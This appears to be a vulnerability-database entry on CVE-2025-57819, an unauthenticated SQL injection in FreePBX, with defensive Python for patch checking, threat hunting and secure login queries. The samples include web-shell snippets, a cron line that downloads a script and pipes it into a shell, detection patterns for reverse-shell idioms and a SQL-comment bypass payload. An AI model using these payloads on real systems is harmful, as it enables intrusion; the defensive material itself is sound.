CVE-2025-57819
Published: 28 August 2025
Summary
CVE-2025-57819 is a critical-severity SQL injection (CWE-89) vulnerability in Sangoma FreePBX. Its CVSS base score is 10.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 1.0% of CVEs by exploit likelihood, CISA has added it to the Known Exploited Vulnerabilities catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
FreePBX is an open-source, web-based graphical user interface for managing Asterisk-based telephony systems. Versions 15, 16, and 17 of its endpoint module insufficiently sanitize user-supplied data, which lets an unauthenticated request reach the FreePBX Administrator interface. The flaw maps to CWE-89 (SQL injection) and CWE-288 (authentication bypass using an alternate path or channel) and carries a CVSS 4.0 score of 10.0; it enables arbitrary database manipulation and remote code execution. Fixes are available in endpoint module releases 15.0.66, 16.0.89, and 17.0.3.
An unauthenticated attacker with network access can exploit the issue without any privileges or user interaction, reaching the administrative interface directly to alter database contents and execute arbitrary code on the underlying system. The attack vector is rated network-reachable with low complexity, and the impact is a total loss of confidentiality, integrity, and availability for both the application and its host.
Official advisories from the FreePBX project and the associated GitHub security advisory recommend an immediate upgrade to the patched endpoint module versions and advise restricting access to the administrator interface until the update can be applied. The vulnerability appears in CISA's Known Exploited Vulnerabilities catalog, confirming in-the-wild exploitation. The EPSS score peaked at 0.8128 and currently stands at 0.7695.
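To turn the fixed releases above into a check that can be run across a fleet, the following added example (not FreePBX or Sangoma code) compares an installed endpoint module version against the fixed release for its branch. The host inventory it runs over is constructed for the example; in practice the installed version would come from FreePBX's module admin (`fwconsole ma list`) or the module's own metadata, and the parsing of that output is not shown here.

```python
"""Added example (not FreePBX/Sangoma code): decide whether an installed
FreePBX 'endpoint' module version is at or above the fixed release for
its branch, as listed in the advisory (15.0.66, 16.0.89, 17.0.3).
The host inventory below is constructed for the example."""
import re

# Fixed endpoint module versions per FreePBX branch, from the advisory.
FIXED_ENDPOINT_VERSIONS = {
    15: (15, 0, 66),
    16: (16, 0, 89),
    17: (17, 0, 3),
}


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '16.0.88' or '16.0.88.1' into a comparable tuple of ints.
    Non-numeric parts (e.g. a '-beta' suffix) are ignored."""
    parts = re.findall(r"\d+", text)
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in parts)


def endpoint_status(version: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown' for an endpoint
    module version. Tuple comparison handles extra trailing components,
    so 15.0.66.2 compares as newer than the fixed 15.0.66."""
    v = parse_version(version)
    fixed = FIXED_ENDPOINT_VERSIONS.get(v[0])
    if fixed is None:
        return "unknown"  # branch not covered by the advisory
    return "patched" if v >= fixed else "vulnerable"


def assess_inventory(inventory: dict[str, str]) -> dict[str, str]:
    """Map each module of one host ({name: version}) to a status.
    Only the 'endpoint' module is assessed against this advisory."""
    return {name: (endpoint_status(ver) if name == "endpoint" else "n/a")
            for name, ver in inventory.items()}


def vulnerable_hosts(hosts: dict[str, dict[str, str]]) -> list[str]:
    """Hosts whose endpoint module is below the fixed release."""
    return sorted(h for h, inv in hosts.items()
                  if assess_inventory(inv).get("endpoint") == "vulnerable")


# Constructed sample inventory (hostnames and versions are not real hosts).
SAMPLE_HOSTS = {
    "pbx-a": {"framework": "16.0.40", "endpoint": "16.0.88"},
    "pbx-b": {"framework": "17.0.19", "endpoint": "17.0.3"},
    "pbx-c": {"framework": "15.0.37", "endpoint": "15.0.66.2"},
}

if __name__ == "__main__":
    for host, inv in SAMPLE_HOSTS.items():
        print(host, assess_inventory(inv))
    print("needs upgrade:", vulnerable_hosts(SAMPLE_HOSTS))
```

A host whose endpoint module is on a branch the advisory does not list is reported as unknown rather than patched, so that an unexpected major version is surfaced for manual review instead of being silently passed.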
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-26123
Vulnerability details
FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied data allowing unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution. This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
- CWE(s): CWE-89, CWE-288
- KEV Date Added: 29 August 2025
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Unauthenticated access via SQL injection enables arbitrary database manipulation and remote code execution (T1190). Post-exploitation activity demonstrated with it includes deploying web shells (T1505.003), adding cron jobs (T1053.003), and creating local accounts (T1136.001).
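The three follow-on techniques above leave artifacts on the PBX host that can be hunted for directly. The following added example (not from the advisory or the FreePBX project) runs simple detection logic for each: a web-shell heuristic over PHP sources, a filter over crontab lines, and a comparison of the current account list against a baseline. Every input is a constructed sample, and every pattern is a generic heuristic rather than an indicator published for this CVE.

```python
"""Added example, not from the advisory or the FreePBX project: hunting
checks for the post-exploitation artifacts in the ATT&CK mapping
(web shells, T1505.003; cron persistence, T1053.003; new local accounts,
T1136.001). Every input below is a constructed sample and every pattern
is a generic heuristic, not an indicator published for this CVE."""
import re

# --- T1505.003: PHP web shell heuristics --------------------------------
DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|php://input", re.I)
OBFUSCATION = re.compile(r"base64_decode|gzinflate|str_rot13|gzuncompress", re.I)


def webshell_score(php_source: str) -> int:
    """0-3: one point each for a dangerous call, request-controlled input
    and a decoding/obfuscation primitive."""
    return sum(bool(p.search(php_source))
               for p in (DANGEROUS_CALLS, REQUEST_INPUT, OBFUSCATION))


def find_webshells(files: dict[str, str], threshold: int = 2) -> list[str]:
    """Paths (of a {path: source} map) scoring at or above threshold."""
    return sorted(p for p, src in files.items()
                  if webshell_score(src) >= threshold)


# --- T1053.003: cron entries that fetch, decode or stage code -----------
SUSPICIOUS_CRON = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh\b"      # download piped into a shell
    r"|base64\s+(-d|--decode)"            # decoding an embedded payload
    r"|/dev/tcp/"                         # bash reverse-shell idiom
    r"|/tmp/\S+\.(sh|php)\b", re.I)       # scripts staged in /tmp


def find_suspicious_cron(crontab: str) -> list[str]:
    """Non-comment crontab lines matching SUSPICIOUS_CRON."""
    return [ln for ln in crontab.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")
            and SUSPICIOUS_CRON.search(ln)]


# --- T1136.001: accounts added since a baseline, or extra UID-0 users ---
def _parse_passwd(text: str) -> dict[str, list[str]]:
    rows = (ln.split(":") for ln in text.splitlines() if ln.count(":") == 6)
    return {f[0]: f for f in rows}


def find_new_accounts(baseline_passwd: str, current_passwd: str) -> dict[str, list[str]]:
    """Users present now but not in the baseline, plus any UID-0 user
    other than root (a common way to hide an administrative backdoor)."""
    base, cur = _parse_passwd(baseline_passwd), _parse_passwd(current_passwd)
    return {
        "new_users": sorted(set(cur) - set(base)),
        "uid0_not_root": sorted(u for u, f in cur.items()
                                if f[2] == "0" and u != "root"),
    }


# --- Constructed samples (not real hosts, files or addresses) -----------
SAMPLE_FILES = {
    "/var/www/html/admin/index.php": "<?php require 'bootstrap.php'; echo 'ok'; ?>",
    "/var/www/html/admin/assets/.cache.php": "<?php @eval(base64_decode($_POST['k'])); ?>",
    "/var/www/html/admin/shell.php": "<?php system($_GET['cmd']); ?>",
}
SAMPLE_CRON = """# m h dom mon dow command
0 4 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot curl -s http://198.51.100.23/x.sh | sh
0 3 * * * /usr/bin/backup --nightly
"""
BASELINE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                   "asterisk:x:995:992::/var/lib/asterisk:/sbin/nologin\n")
CURRENT_PASSWD = (BASELINE_PASSWD +
                  "sysadm:x:0:0::/root:/bin/bash\n"
                  "support:x:1001:1001::/home/support:/bin/bash\n")


def hunt() -> dict:
    """Run all three checks over the constructed samples."""
    return {
        "webshells": find_webshells(SAMPLE_FILES),
        "cron": find_suspicious_cron(SAMPLE_CRON),
        "accounts": find_new_accounts(BASELINE_PASSWD, CURRENT_PASSWD),
    }


if __name__ == "__main__":
    for name, hits in hunt().items():
        print(name, hits)
```

The web-shell scorer deliberately requires two of its three signals, so a legitimate file that merely calls `exec()` or reads `$_POST` is not flagged on its own; on a real host the file list would be walked from the web root and the baseline `passwd` taken from a known-good image or backup.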
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): directly mitigates the vulnerability by upgrading the endpoint module to the fixed releases 15.0.66, 16.0.89, or 17.0.3, which correct the sanitization and authentication-bypass flaws.
- SI-10 (Information Input Validation): addresses the insufficient sanitization of user-supplied data by validating and constraining inputs before they reach the database, so that SQL injection and the resulting database manipulation are prevented.
- AC-3 (Access Enforcement): enforces approved authorizations so that unauthenticated requests cannot reach the FreePBX Administrator interface, countering the authentication bypass.
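The SI-10 item above and the SQL-injection path described under Deeper analysis come down to the same defect: untrusted input spliced into query text, which here also yields an authentication bypass (CWE-288). As an added example, not FreePBX code and not the vulnerable query from the endpoint module, the following shows an authentication lookup built by string concatenation beside a parameterised, input-constrained version. The `admins` table, the user record, the payload and the use of sqlite3 in place of the PBX database are all constructed for illustration.

```python
"""Added example (not FreePBX code): a login check built on concatenated
SQL (CWE-89 leading to CWE-288, authentication bypass) beside the
parameterised version that SI-10-style input handling calls for.
Schema, user and payload are constructed; sqlite3 stands in for the
PBX database. SHA-256 is used only to keep the example self-contained;
a real system uses a slow password hash such as bcrypt or argon2."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed administrator account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, "
                "pw_sha256 TEXT NOT NULL, role TEXT NOT NULL)")
    con.execute("INSERT INTO admins VALUES (?, ?, ?)",
                ("admin", hashlib.sha256(b"correct-horse").hexdigest(),
                 "administrator"))
    con.commit()
    return con


def login_vulnerable(con, username: str, password: str):
    """Builds the query by concatenation: a quote in the username ends
    the string literal and the rest of the input is parsed as SQL, so
    the password clause can be commented away."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT username, role FROM admins WHERE username = '" + username
           + "' AND pw_sha256 = '" + pw_hash + "'")
    return con.execute(sql).fetchone()


def login_hardened(con, username: str, password: str):
    """Two layers: constrain the input shape (what SI-10 asks for), then
    pass values as bound parameters so they are never parsed as SQL."""
    if (not username.isascii() or len(username) > 64
            or not username.replace("_", "").isalnum()):
        return None
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    return con.execute(
        "SELECT username, role FROM admins WHERE username = ? AND pw_sha256 = ?",
        (username, pw_hash)).fetchone()


# Constructed payload: closes the quoted username, then '--' comments out
# the rest of the statement, including the password comparison.
PAYLOAD = "admin' -- "


def demonstrate() -> dict[str, bool]:
    """Show the bypass against the vulnerable query and its absence
    against the hardened one, with a wrong password in both cases."""
    con = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(con, PAYLOAD, "wrong") is not None,
        "hardened_bypassed": login_hardened(con, PAYLOAD, "wrong") is not None,
        "hardened_valid_login": login_hardened(con, "admin", "correct-horse") is not None,
    }


if __name__ == "__main__":
    for check, outcome in demonstrate().items():
        print(check, outcome)
```

Binding parameters is the control that actually removes the injection; the shape check in front of it is defence in depth and also rejects the payload before a query is ever issued, which is the behaviour worth asserting in a regression test.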